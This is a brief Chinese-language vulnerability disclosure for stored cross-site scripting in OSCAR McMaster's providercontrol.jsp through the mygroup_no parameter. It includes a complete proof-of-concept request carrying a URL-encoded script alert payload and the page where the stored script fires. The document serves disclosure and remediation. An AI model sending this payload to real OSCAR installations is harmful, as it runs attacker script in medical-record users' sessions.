OSCAR McMaster 应用程序 19.40~1235 版本的多个页面中存在存储型跨站脚本(XSS)漏洞,该漏洞允许任意执行 JavaScript 命令。
[CVE mitre 的占位符]
易受攻击的 JSP 页面:
providercontrol.jsp - mygroupno 参数
示例易受攻击的载荷:
/oscar/provider/providercontrol.jsp?provider_no=999998&start_hour=8&end_hour=18&every_min=15&color_template=deepblue&dboperation=updatepreference&displaymode=updatepreference&default_servicetype=&prescriptionQrCodes=false&erx_enable=false&erx_training_mode=false&mygroup_no=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E&programId_oscarView=0
存储的响应将在以下链接中针对用户执行:
/oscar/provider/providercontrol.jsp?year=2021&month=8&day=1&view=0&displaymode=month&dboperation=searchappointmentmonth
由 Jack McBride 于 2021 年 8 月发现